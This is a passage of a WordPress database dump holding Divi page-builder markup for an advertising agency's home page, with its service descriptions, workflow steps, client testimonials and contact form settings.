lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial graphic design\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Mritunjya\" title_text=\"Client Testimonial\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" alt=\"Amit\" title_text=\"Client Testimonial digital\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”\n[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 20:01:44','2020-08-08 20:01:44','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(700,1,'2020-08-08 20:02:06','2020-08-08 20:02:06','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" 